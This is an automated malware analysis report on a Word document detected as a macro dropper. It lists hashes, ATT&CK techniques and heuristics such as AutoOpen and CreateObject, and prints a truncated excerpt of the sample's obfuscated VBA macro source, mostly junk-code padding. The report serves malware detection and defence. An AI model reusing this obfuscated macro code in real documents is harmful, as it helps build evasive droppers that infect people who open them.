Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36959811790a76eb…

MALICIOUS

Office (OLE)

270.5 KB Created: 2018-06-11 11:20:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 1be507886b35f687afda4d8d84e74166 SHA-1: a91da1e5c7b1c2e473ed05a29489d41f13cb73e7 SHA-256: 36959811790a76eb443aeb385b3ee647c53ded5c9a2d3b6926add8b8abddb435
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1047 WMI

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6581624-0. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that utilizes CreateObject, suggesting it's designed to execute code. The VBA script itself appears to be obfuscated but the presence of AutoOpen and CreateObject strongly implies a dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6581624-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6581624-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 306082 bytes
SHA-256: 679794100306e01171452f0e3d14b56355eea5f8ea8424e40d33569a9029c120
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "yV7Voz"
Public Function rF4VIYVZp(ByRef bAJk6CY7 As String, ByVal JenUYeAj5ed As String) As String
Dim wGwu3nHp() As Byte
If Application.UserName = "U9yQAyR426Z" Then
MsgBox ("e5OTQOO2KWq")
Else
Dim nLDLhtoJwBzjVb As String
nLDLhtoJwBzjVb = Application.UserName
End If
Dim Fe5SvGhohfk() As Byte
Dim YGv1jaR As String
For A8QeTyStt = 0 To 9
YGv1jaR = YGv1jaR + "U"
Next A8QeTyStt
For CbIRPqjdCJ = 0 To 9
HKeaFXZr = HKeaFXZr + CbIRPqjdCJ
Next CbIRPqjdCJ
Dim JJMVLBPC As Long
For SasRsF8i = 5 To 16
JJMVLBPC = JJMVLBPC + SasRsF8i
Next SasRsF8i
For JHBdli5x = 0 To 7
eGJ2Qtyn = eGJ2Qtyn + JHBdli5x
Next JHBdli5x
Dim Kbj2i8Ox As String
For GTbuekkL3 = 0 To 8
Kbj2i8Ox = Kbj2i8Ox + "C"
Next GTbuekkL3
Dim k9VcYU6J5 As Long
For Mrsi3Tmi = 7 To 12
k9VcYU6J5 = k9VcYU6J5 + Mrsi3Tmi
Next Mrsi3Tmi
Dim IBr7QMj As String
For aoafa3VB = 0 To 6
IBr7QMj = IBr7QMj + "p"
Next aoafa3VB
Dim rVKihlTwDEL As Long
For ug1dx3kXq = 0 To 6
iPv9dGV1 = iPv9dGV1 + ug1dx3kXq
Next ug1dx3kXq
Dim vYs6eu As String
For fpgbH3uJ = 0 To 6
vYs6eu = vYs6eu + "S"
Next fpgbH3uJ
Dim nyXFlC, PFj5Qv As Integer
nyXFlC = 7 + 8
For DIEX8Z0vi = 0 To 6
PFj5Qv = PFj5Qv + DIEX8Z0vi
Next DIEX8Z0vi
If PFj5Qv < DIEX8Z0vi Then
Dim tZ4zaDI As Long
End If
If Len(Application.UserName) < 537 Then
Dim AWs7St As Collection
End If
If Application.UserName = "PIjWkxiuV2E" Then
MsgBox ("xZhxpuK8Y0M")
Else
Dim Y7GelontWGstpu As String
Y7GelontWGstpu = Application.UserName
End If
Dim NaLIv0fcYt As Long
Dim v1O3haGj9e As String
For GLLqXe = 0 To 5
v1O3haGj9e = v1O3haGj9e + "v"
Next GLLqXe
Dim k1pNuRq39k As String
For KIV6dQfA = 0 To 9
k1pNuRq39k = k1pNuRq39k + "Z"
Next KIV6dQfA
Dim dOXhRKX851, mJWAhUcdU As Integer
dOXhRKX851 = 9 + 9
For Dr0BFv = 0 To 5
mJWAhUcdU = mJWAhUcdU + Dr0BFv
Next Dr0BFv
If mJWAhUcdU < Dr0BFv Then
Dim H0Wi3NG As Long
End If
Dim nEg8VEg, PUTakF As Integer
nEg8VEg = 9 + 7
For A6A9bC = 0 To 9
PUTakF = PUTakF + A6A9bC
Next A6A9bC
If PUTakF < A6A9bC Then
Dim vrVK3uqZE As Long
End If
Dim fDKQy9Jhx As Long
For q8hlWk = 9 To 14
fDKQy9Jhx = fDKQy9Jhx + q8hlWk
Next q8hlWk
For XpysBvmrG = 0 To 5
GybUCjcUS = GybUCjcUS + XpysBvmrG
Next XpysBvmrG
Dim q6Ch8KGu As String
For vUgBpQ6i = 0 To 7
q6Ch8KGu = q6Ch8KGu + "L"
Next vUgBpQ6i
If Len(Application.UserName) < 172 Then
Dim tf1gai9Ws As Collection
End If
If Len(Application.UserName) < 553 Then
Dim RAUORS As Collection
End If
Dim wTtFjEzzx0 As Long
Dim FlRBhiJG0, UD4EfMs As Integer
FlRBhiJG0 = 9 + 8
For wkv85bv = 0 To 8
UD4EfMs = UD4EfMs + wkv85bv
Next wkv85bv
If UD4EfMs < wkv85bv Then
Dim pbv8gHG As Long
End If
Dim MMmHWIE As Long
For LPAaHWyTz = 7 To 16
MMmHWIE = MMmHWIE + LPAaHWyTz
Next LPAaHWyTz
Dim CsAyjrIRH, YeHvnsz As Integer
CsAyjrIRH = 7 + 9
For Gy5CH1Ut = 0 To 7
YeHvnsz = YeHvnsz + Gy5CH1Ut
Next Gy5CH1Ut
If YeHvnsz < Gy5CH1Ut Then
Dim pFXFYtHM As Long
End If
Dim Gy6HRCY, atHtdhT As Integer
Gy6HRCY = 8 + 6
For LkmU0m = 0 To 5
atHtdhT = atHtdhT + LkmU0m
Next LkmU0m
If atHtdhT < LkmU0m Then
Dim WrMPYmP6iF As Long
End If
Dim tZZPvyq7Q As String
For HNJ7SWFC3 = 0 To 6
tZZPvyq7Q = tZZPvyq7Q + "G"
Next HNJ7SWFC3
For I2GspU = 0 To 9
dBvLS1naq = dBvLS1naq + I2GspU
Next I2GspU
For fZ8IOtP7M = 0 To 5
qGrhqF = qGrhqF + fZ8IOtP7M
Next fZ8IOtP7M
Dim pnnGQxv3Jh, XtwhsewJ As Integer
pnnGQxv3Jh = 5 + 7
For JwTJrt = 0 To 5
XtwhsewJ = XtwhsewJ + JwTJrt
Next JwTJrt
If XtwhsewJ < JwTJrt Then
Dim ycBiiiLk As Long
End If
If Application.UserName = "KVwXTdnXkBp" Then
MsgBox ("rMPMlkTI6ni")
Else
Dim PRBVJ0bnPWOnv4 As String
PRBVJ0bnPWOnv4 = Application.UserName
End If
If Len(Application.UserName) < 339 Then
Dim tCaj501Wf As Collection
End If
If Application.UserName = "HryrR7nShH0" Then
MsgBox ("SPcz
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.